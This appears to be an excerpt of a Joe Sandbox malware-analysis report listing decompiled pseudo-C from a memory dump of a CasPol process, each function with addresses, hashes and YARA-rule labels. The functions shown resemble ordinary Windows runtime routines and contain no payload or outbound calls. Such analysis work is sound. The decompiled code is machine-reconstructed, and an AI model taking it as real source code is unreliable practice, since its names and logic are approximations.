                                                                                                                                                                                                                                                                                                0x0172b1f3
                                                                                                                                                                                                                                                                                                0x01784a17
                                                                                                                                                                                                                                                                                                0x0172b1f9
                                                                                                                                                                                                                                                                                                0x0172b1f9
                                                                                                                                                                                                                                                                                                0x0172b1f9
                                                                                                                                                                                                                                                                                                0x0172b201
                                                                                                                                                                                                                                                                                                0x01784a21
                                                                                                                                                                                                                                                                                                0x01784a2e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784a3b
                                                                                                                                                                                                                                                                                                0x01784a4d
                                                                                                                                                                                                                                                                                                0x01784a3d
                                                                                                                                                                                                                                                                                                0x01784a46
                                                                                                                                                                                                                                                                                                0x01784a46
                                                                                                                                                                                                                                                                                                0x01784a55
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172b20a
                                                                                                                                                                                                                                                                                                0x0172b20a
                                                                                                                                                                                                                                                                                                0x0172b20a
                                                                                                                                                                                                                                                                                                0x0172b20a

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ae7a85365034bf8c0e1d94e9413c90a60afebbb6ec2eec5ea44e1d89abbe05a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22014432240680DBD322A76DC808F6AFBD8EF92350F0904A1FA058B2B2D7B8C900C315
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017E131B Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                                			E017E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x181d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01747D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L0176B640(E01769AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                                                                                                                                                                                                                                                                0x017e131b
                                                                                                                                                                                                                                                                                                0x017e132a
                                                                                                                                                                                                                                                                                                0x017e1330
                                                                                                                                                                                                                                                                                                0x017e1336
                                                                                                                                                                                                                                                                                                0x017e133e
                                                                                                                                                                                                                                                                                                0x017e1341
                                                                                                                                                                                                                                                                                                0x017e1344
                                                                                                                                                                                                                                                                                                0x017e134f
                                                                                                                                                                                                                                                                                                0x017e1361
                                                                                                                                                                                                                                                                                                0x017e1351
                                                                                                                                                                                                                                                                                                0x017e135a
                                                                                                                                                                                                                                                                                                0x017e135a
                                                                                                                                                                                                                                                                                                0x017e136c
                                                                                                                                                                                                                                                                                                0x017e136d
                                                                                                                                                                                                                                                                                                0x017e136f
                                                                                                                                                                                                                                                                                                0x017e1387

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 92c37059f0c0be466c32f4460995899965ab0f0d9e1f5e01cc8813114d4ababd
                                                                                                                                                                                                                                                                                                • Instruction ID: 20e2a324dcc9c57a677988765cefd8107d09bca14326d85275875663d66bd411
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92c37059f0c0be466c32f4460995899965ab0f0d9e1f5e01cc8813114d4ababd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2013C71A01209AFCB04EFA9D549AAEF7F8FF18700F508059FD45EB381EA349A00CB54
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0174C577 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0174C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || L0174C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E017F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                                                                                                                                                                                0x0174c577
                                                                                                                                                                                                                                                                                                0x0174c57d
                                                                                                                                                                                                                                                                                                0x0174c581
                                                                                                                                                                                                                                                                                                0x0174c5b5
                                                                                                                                                                                                                                                                                                0x0174c5b9
                                                                                                                                                                                                                                                                                                0x0174c5ce
                                                                                                                                                                                                                                                                                                0x0174c5ce
                                                                                                                                                                                                                                                                                                0x0174c5ca
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174c5ca
                                                                                                                                                                                                                                                                                                0x0174c5c4
                                                                                                                                                                                                                                                                                                0x0174c5c8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174c5ad
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174c5af

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b16115685e2aa704ec457ecf3d3c2480bd4387e8445d23ab97c983ba24aeba2b
                                                                                                                                                                                                                                                                                                • Instruction ID: 98e8a3af12cc9416dd4cae678cbecc0a8591e12be884397bcf26d3e8a108107d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b16115685e2aa704ec457ecf3d3c2480bd4387e8445d23ab97c983ba24aeba2b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0B4B29176909FE737C71CC004B3AFFD49B05670F7484A7D51587242D7A4D880C2D1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F8D34 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                			E017F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x181d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01747D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L0176B640(E01769AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}













                                                                                                                                                                                                                                                                                                0x017f8d34
                                                                                                                                                                                                                                                                                                0x017f8d43
                                                                                                                                                                                                                                                                                                0x017f8d4b
                                                                                                                                                                                                                                                                                                0x017f8d4e
                                                                                                                                                                                                                                                                                                0x017f8d52
                                                                                                                                                                                                                                                                                                0x017f8d5c
                                                                                                                                                                                                                                                                                                0x017f8d6e
                                                                                                                                                                                                                                                                                                0x017f8d5e
                                                                                                                                                                                                                                                                                                0x017f8d67
                                                                                                                                                                                                                                                                                                0x017f8d67
                                                                                                                                                                                                                                                                                                0x017f8d79
                                                                                                                                                                                                                                                                                                0x017f8d7a
                                                                                                                                                                                                                                                                                                0x017f8d7c
                                                                                                                                                                                                                                                                                                0x017f8d94

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 07504d858838fc33ed98a2076f05799c6b3b03cb3f39f64cbfb7f6728bda497f
                                                                                                                                                                                                                                                                                                • Instruction ID: eb90ff2f47e204f11104b947f49d2b44c73478affd27dace64db70cf098d81bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07504d858838fc33ed98a2076f05799c6b3b03cb3f39f64cbfb7f6728bda497f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0B470A046089FDB14EFB8D445B6EF7B8EF18300F508099EA05EB380EA34DA00CB54
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0176927A Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E0176927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01744620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0176FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017692C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                                                                                                                                                                                                0x01769295
                                                                                                                                                                                                                                                                                                0x01769299
                                                                                                                                                                                                                                                                                                0x0176929f
                                                                                                                                                                                                                                                                                                0x017692aa
                                                                                                                                                                                                                                                                                                0x017692ad
                                                                                                                                                                                                                                                                                                0x017692ae
                                                                                                                                                                                                                                                                                                0x017692af
                                                                                                                                                                                                                                                                                                0x017692b0
                                                                                                                                                                                                                                                                                                0x017692b4
                                                                                                                                                                                                                                                                                                0x017692bb
                                                                                                                                                                                                                                                                                                0x017692bb
                                                                                                                                                                                                                                                                                                0x017692c5

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                                                                                                                • Instruction ID: 5e74743c6da3ad96e865173dd58b3c038556f1bc34ebc3ddb6245d0f52ce0c4e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE02B323405016FE7119E09DCC4F17B75DEF92724F004078FA001E242C6F5DD0887A0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017E2073 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                                			E017E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = L017DFD22(__ecx);
				_t19 =  *0x181849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1818748; // 0x0
					if(__eflags <= 0) {
						L017E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1818724 & 0x00000004;
							if(( *0x1818724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1818724; // 0x0
					_push( !_t7 >> 0x00000002 & 0x00000001);
					return L017D8DF1(__ebx, 0xc0000374, 0x1815890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                                                                                                                                                                                0x017e2076
                                                                                                                                                                                                                                                                                                0x017e2078
                                                                                                                                                                                                                                                                                                0x017e207d
                                                                                                                                                                                                                                                                                                0x017e2083
                                                                                                                                                                                                                                                                                                0x017e20a4
                                                                                                                                                                                                                                                                                                0x017e20aa
                                                                                                                                                                                                                                                                                                0x017e20ac
                                                                                                                                                                                                                                                                                                0x017e20b7
                                                                                                                                                                                                                                                                                                0x017e20ba
                                                                                                                                                                                                                                                                                                0x017e20bc
                                                                                                                                                                                                                                                                                                0x017e20c9
                                                                                                                                                                                                                                                                                                0x017e20c9
                                                                                                                                                                                                                                                                                                0x017e20d0
                                                                                                                                                                                                                                                                                                0x017e20d2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017e20d2
                                                                                                                                                                                                                                                                                                0x017e20be
                                                                                                                                                                                                                                                                                                0x017e20c3
                                                                                                                                                                                                                                                                                                0x017e20c5
                                                                                                                                                                                                                                                                                                0x017e20c7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017e20c7
                                                                                                                                                                                                                                                                                                0x017e20bc
                                                                                                                                                                                                                                                                                                0x017e20d4
                                                                                                                                                                                                                                                                                                0x017e2085
                                                                                                                                                                                                                                                                                                0x017e2085
                                                                                                                                                                                                                                                                                                0x017e209c
                                                                                                                                                                                                                                                                                                0x017e20a3
                                                                                                                                                                                                                                                                                                0x017e20a3

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 65bec86a6a65b7840b7ddc208410f196984558abcf9df1a914dab4a50baa7ad5
                                                                                                                                                                                                                                                                                                • Instruction ID: cb90e6e35c00a7ba0c3c5268cdd862416582bda5db647f6a8e9c874cef14b1ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bec86a6a65b7840b7ddc208410f196984558abcf9df1a914dab4a50baa7ad5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF0A06B8151894BDF326B28655A2E2AFEED79E110B490885D9A05728EC9348A93CF24
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F8B58 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                                			E017F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x181d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01747D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L0176B640(E01769AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                                                                                                                                                                                                                                                                0x017f8b67
                                                                                                                                                                                                                                                                                                0x017f8b6f
                                                                                                                                                                                                                                                                                                0x017f8b72
                                                                                                                                                                                                                                                                                                0x017f8b7d
                                                                                                                                                                                                                                                                                                0x017f8b8f
                                                                                                                                                                                                                                                                                                0x017f8b7f
                                                                                                                                                                                                                                                                                                0x017f8b88
                                                                                                                                                                                                                                                                                                0x017f8b88
                                                                                                                                                                                                                                                                                                0x017f8b9a
                                                                                                                                                                                                                                                                                                0x017f8b9b
                                                                                                                                                                                                                                                                                                0x017f8b9d
                                                                                                                                                                                                                                                                                                0x017f8bb5

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ed4027311e5170e325add83085bff3670b568bb25f2727b03761def6adbe49f
                                                                                                                                                                                                                                                                                                • Instruction ID: 18de5d9333053d7132f5bc42046d03cb8a234284033ee95c5828a5422dfcf7ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ed4027311e5170e325add83085bff3670b568bb25f2727b03761def6adbe49f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86F082B1A1425DAFDB14EBA8D90AE6FF7B8EF14300F440499BA05DB380EB34DA00C795
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172F358 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E0172F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0175F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01744620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                                                                                                                                                                                0x0172f35d
                                                                                                                                                                                                                                                                                                0x0172f361
                                                                                                                                                                                                                                                                                                0x0172f367
                                                                                                                                                                                                                                                                                                0x0172f372
                                                                                                                                                                                                                                                                                                0x0172f38c
                                                                                                                                                                                                                                                                                                0x0172f38c
                                                                                                                                                                                                                                                                                                0x0172f394

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                                                                                                                • Instruction ID: aa311fb167e71ba264c61831a58b2039f137a8d4e043b7408fee1367271a3e97
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E0DF32A40128FBDB61AAD99E09FAAFFBCEB58AA0F000196FA04D7151D5709E00D2D1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017B41E8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                			E017B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x18008f0);
				_t5 = E0177D08C(__ebx, __edi, __esi);
				if( *0x18187ec == 0) {
					L0173EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18187ec == 0) {
						 *0x18187f0 = 0x18187ec;
						 *0x18187ec = 0x18187ec;
						 *0x18187e8 = 0x18187e4;
						 *0x18187e4 = 0x18187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L017B4248();
				}
				return E0177D0D1(_t5);
			}





                                                                                                                                                                                                                                                                                                0x017b41e8
                                                                                                                                                                                                                                                                                                0x017b41ea
                                                                                                                                                                                                                                                                                                0x017b41ef
                                                                                                                                                                                                                                                                                                0x017b41fb
                                                                                                                                                                                                                                                                                                0x017b4206
                                                                                                                                                                                                                                                                                                0x017b420b
                                                                                                                                                                                                                                                                                                0x017b4216
                                                                                                                                                                                                                                                                                                0x017b421d
                                                                                                                                                                                                                                                                                                0x017b4222
                                                                                                                                                                                                                                                                                                0x017b422c
                                                                                                                                                                                                                                                                                                0x017b4231
                                                                                                                                                                                                                                                                                                0x017b4231
                                                                                                                                                                                                                                                                                                0x017b4236
                                                                                                                                                                                                                                                                                                0x017b423d
                                                                                                                                                                                                                                                                                                0x017b423d
                                                                                                                                                                                                                                                                                                0x017b4247

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd3dd442b2aa1adfc012d0a396c5570788d01c5c8ebc1383246117b76fecb556
                                                                                                                                                                                                                                                                                                • Instruction ID: af71ac2ad6f3b19a56a4ca458f9d4bd7ee250a581552aede7e26416edacf369b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd3dd442b2aa1adfc012d0a396c5570788d01c5c8ebc1383246117b76fecb556
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F03976851705CFCBB2EFA9D54AB94B6B8FB56311F00492A92028728EC73447A5DF11
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017DD380 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E017DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0172E8B0(__ecx, _a4, 0xfff);
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                                                                                                                                                                                0x017dd38a
                                                                                                                                                                                                                                                                                                0x017dd39b
                                                                                                                                                                                                                                                                                                0x017dd3b1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017dd3b6
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                                                                                                                • Instruction ID: 44a4b249c13a2ca95a16acc9264b3b75bc1807cfdf12836957e46321f9e3d2e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE0C231280219FBDB325E84CC00F69FB26EB507A0F104031FE489A6D0CA719C91D6C4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175A185 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0175A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18167e4 >= 0xa) {
					if(_t5 < 0x1816800 || _t5 >= 0x1816900) {
						return L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01740010(0x18167e0, _t5);
				}
			}





                                                                                                                                                                                                                                                                                                0x0175a190
                                                                                                                                                                                                                                                                                                0x0175a1a6
                                                                                                                                                                                                                                                                                                0x0175a1c2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175a192
                                                                                                                                                                                                                                                                                                0x0175a192
                                                                                                                                                                                                                                                                                                0x0175a19f
                                                                                                                                                                                                                                                                                                0x0175a19f

                                                                                                                                                                                                                                                                                                Memory Dump Source
